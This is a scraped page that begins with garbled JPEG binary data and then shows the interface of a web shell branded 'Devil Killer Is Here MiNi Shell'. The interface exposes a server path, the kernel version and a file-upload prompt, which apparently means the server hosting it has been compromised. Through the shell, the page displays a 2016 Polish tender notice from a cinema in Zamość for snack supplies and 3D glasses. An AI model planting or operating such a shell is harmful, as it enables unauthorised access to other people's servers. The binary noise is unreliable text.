JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20161208/362093-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.stylowy.net' target='_blank'>http://www.bip.stylowy.net</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 362093 - 2016
              z dnia 2016-12-08 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zamość: Dostawa sukcesywnie w 2017 roku artykułów spożywczych,
opakowań i produktów do sporządzania  napojów na potrzeby
 baru Centrum Kultury Filmowej Stylowy w Zamościu oraz okularów polaryzacyjnych do projekcji 3D 
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Centum Kultury Filmowej Stylowy, krajowy numer identyfikacyjny
              95000149000000, ul.
              ul. Odrodzenia 
              9,
              22400  
              Zamość, woj.
              lubelskie, państwo
              Polska, tel.
              84 639 23 13, e-mail
              kino@stylowy.net, faks
              84 639 23 13.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: samorządowa instytucja kultury</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.stylowy.net</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofery należy złożyć w formie pisemnej<br />
                Adres:
                <br />siedziba Zamawiającego - Centrym Kultury Filmowej "Stylowy" w Zamościu  ul. Odrodzenia 9, 22-400 Zamość pok. nr 208  </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa sukcesywnie w 2017 roku artykułów spożywczych,
opakowań i produktów do sporządzania  napojów na potrzeby
 baru Centrum Kultury Filmowej Stylowy w Zamościu oraz okularów polaryzacyjnych do projekcji 3D 
<br /><b>Numer referencyjny: </b>PN/2/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest dostawa sukcesywnie w 2017 roku artykułów spożywczych, opakowań do popcornu, do nachos i do napojów, produktów                      do sporządzania  napojów na potrzeby baru Centrum Kultury Filmowej Stylowy                          w Zamościu oraz okularów polaryzacyjnych do projekcji 3D.
2.	Zamówienie jest realizowane w podziale na 10 części:
Część 1 zamówienia  Dostawa ziarna popcornu, tłuszczu i soli oraz mieszanki karmelowej,
Część 2 zamówienia  Dostawa nachos (chipsów trójkątnych smakowych) i sosów do nachos,
Część 3 zamówienia  Dostawa opakowań do popcornu,
Część 4 zamówienia  Dostawa opakowań do nachos (chipsów trójkątnych),
Część 5 zamówienia  Dostawa opakowań do napoju mrożonego granita,
Część 6 zamówienia  Dostawa syropów do napoju mrożonego granita,
Część 7 zamówienia  Dostawa orzeszków Crispers Felix,
Część 8 zamówienia  Dostawa opakowań do popcornu i napoju w zestawie, 
Część 9 zamówienia  Dostawa napojów bezalkoholowych i wody mineralnej w butelkach oraz produktów do przygotowywania napojów bezalkoholowych z dystrybutora: syropu, gazu CO2, kubków jednorazowych, pokrywek, słomek,
Część 10 zamówienia  Dostawa okularów polaryzacyjnych jednorazowego użytku do projekcji 3D w systemie DepthQ na srebrnych ekranach.                                       

3.	Szczegółowy opis przedmiotu zamówienia został zawarty w załącznikach nr 1a-1j                     do SIWZ.
4.	Zamówienie obejmuje zakup i dostawę artykułów w asortymencie i ilości określonych                  w opisie przedmiotu zamówienia (załączniki nr 1a-1j do SIWZ) oraz w formularzach asortymentowo  cenowych (załączniki nr 2a-2j do SIWZ). 
5.	Ilości artykułów spożywczych i opakowań wskazane dla poszczególnych części zamówienia są ilościami maksymalnymi przedmiotu zamówienia. Realizacja umowy następować będzie według rzeczywistych potrzeb Zamawiającego. Zamawiającemu przysługuje prawo do niezrealizowania części zamówienia bez podania przyczyny,                          a Wykonawca nie będzie wnosił jakichkolwiek roszczeń co do ilości faktycznie realizowanych przez Zamawiającego w toku realizacji umowy w sprawie niniejszego zamówienia publicznego.
6.	Ilość zamówionych artykułów, o których mowa w pkt 4 i 5  może ulec zmniejszeniu w wyniku jednostronnego oświadczenia Zamawiającego bez podania przyczyny. W przypadku zmniejszenia przez Zamawiającego ilości zamawianych produktów, Wykonawca nie będzie mógł domagać się naprawienia szkody, która została spowodowana tą zmianą i nie stwarza podstaw do żądania zmiany warunków umowy,              w tym także ceny.
7.	Zamawiający każdorazowo określi ilość i rodzaj artykułów przed dostawą. Dostawy będą realizowane na podstawie zamówień składanych przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (tekst jedn. Dz.U. z 2016 r. poz. 1030 z późn. zm.) lub telefonicznie z pisemnym potwierdzeniem, z co najmniej jednodniowym wyprzedzeniem przez upoważnione do tego osoby, w ilościach, asortymencie i terminie zgodnym                               z zamówieniem (rozumie się przez to również dostawy w weekendy oraz zamówienia, których czas realizacji określono jako szybki). 
8.	Wykonawca zobowiązany jest do:
a)	sukcesywnego dostarczania przedmiotu zamówienia w asortymencie i ilości zgodnej ze złożonym zamówieniem, w terminie określonym przez Zamawiającego,
b)	dostarczania artykułów do baru Centrum Kultury Filmowej Stylowy                               w Zamościu ul. Odrodzenia 9, 22-400 Zamość transportem na własny koszt                 i ryzyko,
c)	dostarczenia artykułów I gatunku, pakowanych i przewożonych w odpowiednich warunkach zgodnie z wymogami odpowiednich przepisów. Zamawiający wymaga aby towar był wysokiej jakości, opisany, dostarczany w nieuszkodzonych opakowaniach. Każdorazowa dostawa będzie sprawdzana przez Zamawiającego pod względem jakościowym i ilościowym. W przypadku stwierdzenia przy odbiorze rozbieżności pomiędzy złożonym zamówieniem a dostarczonymi artykułami Wykonawca zobowiązany jest dokonać dostawy zgodnie z treścią zamówienia w czasie nie dłuższym niż 3 dni. (Czas dostawy artykułów w przypadku ich reklamacji może ulec skróceniu.  Czas dostawy artykułów w przypadku reklamacji podlega punktacji zgodnie z zasadami określonymi w Rozdziale XIV specyfikacji istotnych warunków zamówienia ponieważ stanowi dodatkowe kryterium oceny ofert.)  
d)	W przypadku, gdy świeżość artykułów budzi jakiekolwiek wątpliwości, Zamawiający ma prawo zwrotu danej partii artykułów i żądać dostawy świeżych artykułów, a Wykonawca zobowiązany jest dokonać dostawy świeżych artykułów w ilości odpowiadającej zwróconej partii artykułów w czasie nie dłuższym niż 3 dni. (Czas dostawy artykułów w przypadku ich reklamacji może ulec skróceniu.  Czas dostawy artykułów w przypadku reklamacji podlega punktacji zgodnie z zasadami określonymi w Rozdziale XIV specyfikacji istotnych warunków zamówienia ponieważ stanowi dodatkowe kryterium oceny ofert.) 
e)	zapłata należności za wykonaną dostawę nastąpi przelewem na podstawie każdorazowo wystawionej przez Wykonawcę faktury, w terminie 14 dni od dnia podpisania protokołu odbioru artykułów bez zastrzeżeń oraz doręczenia Zamawiającemu prawidłowo wystawionej faktury VAT na konto Wykonawcy wskazane na fakturze. Kwota należności zostanie obliczona na podstawie cen jednostkowych określonych w ofercie Wykonawcy. Faktury będą wystawiane zgodnie z poszczególnymi zamówieniami i doręczane bezpośrednio do siedziby Zamawiającego  Centrum Kultury Filmowej Stylowy w Zamościu                              ul. Odrodzenia 9, 22-400 Zamość. Za termin dokonania zapłaty strony przyjmują datę obciążenia kwotą należności rachunku bankowego Zamawiającego.
<br /><br /><b>II.5) Główny kod CPV: </b>15800000-6<br /><b> Dodatkowe kody CPV:</b>39222120-1,
                39222100-5,
                15980000-1,
                33734000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b>1. Zamawiający wymaga aby zamówienie było realizowane sukcesywnie od dnia 01.01.2017 r. (lub od dnia podpisania umowy, jeśli termin ten będzie późniejszy) do dnia 31.12.2017 r.  lub do wyczerpania kwoty umowy brutto  w zależności od tego co nastąpi wcześniej.
2. Informacje dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (spółki cywilne, konsorcja):
2. 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W taki przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu                         o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy                        w sprawie zamówienia publicznego.
2.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden     z nich, nie może podlegać wykluczeniu z postępowania z powodu przesłanek określonych w pkt III.2.1 ogłoszenia. 
3.Informacje dla Wykonawców polegających na zasobach innych podmiotów                     na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych:
3.1.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,                    w stosownych sytuacjach oraz w odniesieniu do zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. 
3.2	W sytuacji, o której o mowa w pkt 3.1, Wykonawca zobowiązany jest udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów  do oddania                   mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (art. 22a ust. 2 ustawy Prawo zamówień publicznych).
3.3	Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają                            na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 12-23 ustawy Prawo zamówień publicznych.
3.4	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują dostawy, do realizacji których te zdolności są wymagane.
3.5	Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów,                     za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
3.6	Jeżeli zdolności techniczne lub zawodowe lub sytuacja finansowa lub ekonomiczna podmiotów, na zasobach których Wykonawca polega, nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez Zamawiającego:
a)	zastąpił ten podmiot innym podmiotem lub podmiotami lub
b)	zobowiązał się do osobistego wykonania odpowiedniej części zamówienia,
jeżeli wykaże zdolności techniczne lub zawodowe lub sytuację finansową                                  lub ekonomiczną.
4.Informacje dotyczące realizacji przedmiotu zamówienia przy udziale podwykonawców:
4.1	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
4.2	Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia, o których mowa w art. 36a ust. 2 pkt 1 ustawy Prawo zamówień publicznych.
4.3	Wykonawca, który zamierza realizować zamówienie przy udziale podwykonawców jest zobowiązany wskazać w formularzu ofertowym (według wzoru stanowiącego odpowiednio załącznik nr 1a, 1b, 1c, 1d, 1e, 1f, 1g, 1h, 1i, 1j do SIWZ), jaką część zamówienia zamierza powierzyć podwykonawcom oraz, o ile jest to wiadome, podać firmy podwykonawców.
4.4	Zamawiający żąda, aby przed przystąpieniem do wykonania zamówienia Wykonawca, o ile są już znane, podał nazwy albo imiona i nazwiska oraz dane kontaktowe podwykonawców i osób do kontaktu z nimi, zaangażowanych w realizację dostaw. Wykonawca zawiadamia Zamawiającego o wszelkich zmianach ww. danych, w trakcie realizacji zamówienia, a także przekazuje informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację dostaw.
4.5	Wykonawca, który w celu wykazania spełnienia warunków udziału w postępowaniu, dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, polega na zdolnościach innych podmiotów, zobowiązany jest do zapewnienia bezpośredniego udziału tych podmiotów w realizacji dostaw, do realizacji których te zdolności są wymagane. 
4.6	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest zobowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.
4.7	Jeżeli powierzenie podwykonawcy wykonania części zamówienia następuje w trakcie jego realizacji, Wykonawca na żądanie Zamawiającego przedstawia oświadczenie, o którym mowa w art. 25a ust. 1 ustawy Prawo zamówień publicznych, lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego podwykonawcy. 
4.8	Jeżeli Zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, Wykonawca zobowiązany jest zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy.
4.9	Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych kompetencji lub uprawnień.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowych warunków w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowych warunków w tym zakresie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">

Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej www.bip.stylowy.net informacji, o której mowa w art. 86 ust. 5 ustawy Prawo zamówień publicznych, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Prawo zamówień publicznych; propozycja treści oświadczenia stanowi załącznik nr 4 do SIWZ. 
Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody,                                       że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji                       w postępowaniu o udzielenie zamówienia. 


</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Zamawiający, przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie  próbek okularów i nakładek, tj. okulary dla dorosłych (1 szt.), okulary dla dzieci (1 szt.), okulary wielorazowe/premium duże (1 szt.), nakładki na okulary korekcyjne (1 szt.) - w celu potwierdzenia, że oferowane dostawy spełniają wymagania postawione przez Zamawiającego.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Dokumenty dotyczące innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych:
